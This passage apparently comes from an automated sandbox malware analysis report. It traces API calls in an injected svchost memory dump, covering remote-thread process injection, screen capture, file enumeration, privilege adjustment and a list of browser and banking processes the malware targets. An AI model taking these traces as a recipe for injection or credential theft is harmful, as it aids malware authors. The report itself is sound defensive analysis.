                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                                Function 02BB7680 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 215memoryfilestringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,02BD45D3,?,02C0D2A0,7556F380), ref: 02BB76BB
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB76C2
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB76DA
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,02BD45C4,00000104), ref: 02BB76E9
                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 02BB7711
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                • API String ID: 2617121151-1173974218
                                                                                                                                                                                                                • Opcode ID: 227555c9ae502ae4a938cb8a9b3fc3c83f47407aea69795b130b28b5342c85e1
                                                                                                                                                                                                                • Instruction ID: 83c46cee8782fb56e1a95ee93554f2ab6d0aad4819a3710e9553c264a884cc70
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 227555c9ae502ae4a938cb8a9b3fc3c83f47407aea69795b130b28b5342c85e1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 566105729042455BCB228F359C98FF7BFA9EF85794F084694FA9287281EF61D409C7A0
                                                                                                                                                                                                                Function 02BD4CC0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 211injectionlibrarymemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: memset.MSVCRT ref: 02BD56A6
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,75570F00), ref: 02BD56B7
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: GetLastError.KERNEL32 ref: 02BD56C0
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: SwitchToThread.KERNEL32 ref: 02BD56CF
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56D8
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD56F8
                                                                                                                                                                                                                  • Part of subcall function 02BD5680: CloseHandle.KERNEL32(00000000), ref: 02BD5709
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02BD4CFF
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02BD4D1E
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BD4D3D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BD4D53
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02BD4D5F
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BD4D7A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BD4D8A
                                                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02BD4DC4
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02BD4DE5
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02BD4E11
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,00003000,00000004), ref: 02BD4E29
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02BD4E44
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02BD4E52
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02BD4E7A
                                                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD4E8C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD4EA4
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD4EB5
                                                                                                                                                                                                                • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD4ED6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD4EF2
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD4F03
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 2650560580-3024904723
                                                                                                                                                                                                                • Opcode ID: f65b58ec25810f257154d9f40708fff7cf862138ba577591463d415b3b901667
                                                                                                                                                                                                                • Instruction ID: 28172f90e5e0e640766d7087b7683017d09902a65e3f7253698369a4a91b92d5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f65b58ec25810f257154d9f40708fff7cf862138ba577591463d415b3b901667
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED617075640305BBEB64DF64CC88FEA7BB8EF84744F548459FA059B280E7B4EA41CB60
                                                                                                                                                                                                                Function 02BD54A0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 164memorywindowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 02BD54B0
                                                                                                                                                                                                                • GetWindowDC.USER32(00000000), ref: 02BD54B7
                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 02BD54C8
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 02BD54E1
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BD54E9
                                                                                                                                                                                                                • CreateDIBSection.GDI32(00000000,?,00000001,?,00000000,00000000), ref: 02BD5522
                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 02BD552C
                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 02BD5549
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 02BD554F
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02BD5559
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00001020), ref: 02BD556F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BD5576
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD558A
                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02BD55A5
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: GetProcessHeap.KERNEL32(00000008,02BC0BF7,02BC0BE3,?,02BC8A25,?,?,?), ref: 02BC4181
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02BC4188
                                                                                                                                                                                                                  • Part of subcall function 02BC4170: memset.MSVCRT ref: 02BC4198
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000,6F8890B0,02BC0C69), ref: 02BC41BE
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: HeapValidate.KERNEL32(00000000), ref: 02BC41C1
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: RtlFreeHeap.NTDLL(00000000), ref: 02BC41D1
                                                                                                                                                                                                                • GetDIBits.GDI32(02BCFDFB,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD55F4
                                                                                                                                                                                                                • ReleaseDC.USER32(?,02BCFDFB), ref: 02BD566C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Window$BitsCapsCreateDesktopDevicememset$AllocAllocateCompatibleFreeObjectReleaseSectionSelectValidate
                                                                                                                                                                                                                • String ID: ($BM
                                                                                                                                                                                                                • API String ID: 3203594236-2980357723
                                                                                                                                                                                                                • Opcode ID: 736d35adc55be928bc74a0b105f8a69d98fc3f2c9d385d25eb5be619c00e2c02
                                                                                                                                                                                                                • Instruction ID: 6d75488d0c9ad639daa8b2a7b8a0c34c38ebcfbf3f33a37ee59a5191c2e94c15
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 736d35adc55be928bc74a0b105f8a69d98fc3f2c9d385d25eb5be619c00e2c02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B5181B2D40214AFDB609FA4DC48BAEBBB9EF48750F504559FA05FB240DBB499008BA4
                                                                                                                                                                                                                Function 02BD9910 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 178filememoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75572F00), ref: 02BD9991
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD99AD
                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 02BD99BC
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 02BD99C9
                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BD9A08
                                                                                                                                                                                                                • wsprintfA.USER32 ref: 02BD9A16
                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,?), ref: 02BD9B0D
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 02BD9B1C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FileLocalwsprintf$AllocCloseFirstFreeNext_snprintf
                                                                                                                                                                                                                • String ID: %s%s$%s\%s$%s\*$.
                                                                                                                                                                                                                • API String ID: 2477558990-1591360731
                                                                                                                                                                                                                • Opcode ID: 576e1c5355d0aeacef1504503affc6409720645d3e22cd154972b019e9e49bb4
                                                                                                                                                                                                                • Instruction ID: b461757818bfddfe25a2474a52112285c5a7b3e154ad9055e720712d42659565
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576e1c5355d0aeacef1504503affc6409720645d3e22cd154972b019e9e49bb4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F551B5B1604741AFD320DF54C888FEBBBE9FB85704F044A8DFA9597244E7749948CBA1
                                                                                                                                                                                                                Function 02BC4F80 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87networkstringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                                • DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75570F10), ref: 02BC4FE7
                                                                                                                                                                                                                • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75570F10), ref: 02BC5045
                                                                                                                                                                                                                • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                                • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                                • API String ID: 1656757314-3977723178
                                                                                                                                                                                                                • Opcode ID: c3c80d3cf26a5e342067f1323bf404e87d75f50e9bf4ab15635f7090e8849dac
                                                                                                                                                                                                                • Instruction ID: d59620ce9ac73ee1955c6b66e805a94096b6de4643486066d5af0fae7501bad0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3c80d3cf26a5e342067f1323bf404e87d75f50e9bf4ab15635f7090e8849dac
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3621A476A8431867EB70D6A4AC41FDAB76CDB54750F4045D5F788E7080DAF0AAD48BE0
                                                                                                                                                                                                                Function 02BB7FD0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 76sleepsynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02BB7FF1
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BB8002
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}), ref: 02BB8010
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB8019
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BB802F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB8041
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BB8069
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02BB8082
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 02BB808D
                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000), ref: 02BB8099
                                                                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 02BB80A4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Mutex$HandleOpenSleep$CloseEventExitFileInformationModuleNameProcessRelease
                                                                                                                                                                                                                • String ID: Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}$P0Wu$\explorer.exe
                                                                                                                                                                                                                • API String ID: 2248524772-1625487603
                                                                                                                                                                                                                • Opcode ID: f53ae14284c4754efe3b20052a0e5a2e2f2cd9e1a8e46bee7dbb2bd5f79cc01d
                                                                                                                                                                                                                • Instruction ID: bdadd71732932befece7347989e09c4e95afc028ad2e3b1966c15d383ebf5caa
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f53ae14284c4754efe3b20052a0e5a2e2f2cd9e1a8e46bee7dbb2bd5f79cc01d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B21C6319807046AD272A769DC49BBAB7ACEF80B91F810B55FB9497180DBF4D8148BA1
                                                                                                                                                                                                                Function 02BC78A0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89memoryprocessCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02BC78B4
                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 02BC78D9
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02BC78FD
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02BC7917
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC793B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02BC7941
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02BC7948
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC7977
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,75570F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CloseHandle.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 02BC798B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC79A5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02BC79B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02BC7912
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocateCharCreateCurrentEnterFirstLeaveNextSnapshotToolhelp32Upper
                                                                                                                                                                                                                • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                                • API String ID: 838372802-4199822264
                                                                                                                                                                                                                • Opcode ID: aa8d9ff5b15adf2a47f33c833467a93ff52ab8cf0fa7cdf58e88e5a2cb5ccb26
                                                                                                                                                                                                                • Instruction ID: 86ddc1ba09dd5f4d1feefc29551ea670cf9d23cd45951d4c89e6feee8e88382c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa8d9ff5b15adf2a47f33c833467a93ff52ab8cf0fa7cdf58e88e5a2cb5ccb26
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C317E71901215ABE7709F65D808BAEBBBCFF48794F604498EA49D3240DB709A91DFA0
                                                                                                                                                                                                                Function 02BB79E0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91threadstringnativeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02BB79FC
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02BB7A0F
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,75570F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CloseHandle.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                                  • Part of subcall function 02BD4880: CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BB7A1E
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BB7A37
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02BB7A3E
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BB7A54
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB7A99
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB7AB3
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 02BB7AC6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Information$Handle$OpenProcess$CloseCurrentThreadToken$CharDesktopMutexObjectQuerySystemUpperUser_snprintflstrcmpimemset
                                                                                                                                                                                                                • String ID: 9e93884aa$Global\HighMemoryEvent_%08x
                                                                                                                                                                                                                • API String ID: 1400009243-2197521726
                                                                                                                                                                                                                • Opcode ID: 51dce2e0c24740cc8711bb1ed71a26208b3245cc3415ca190950652093c58492
                                                                                                                                                                                                                • Instruction ID: 31d5589392b88263f42f3306ae7d39703818fdcd062410fce8c0d486732bd0df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51dce2e0c24740cc8711bb1ed71a26208b3245cc3415ca190950652093c58492
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2031C072940215ABDB61CE54DC84FFBB36CEF85B10F540485BE55A7280EBF0AE50DBA0
                                                                                                                                                                                                                Function 02BD5930 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
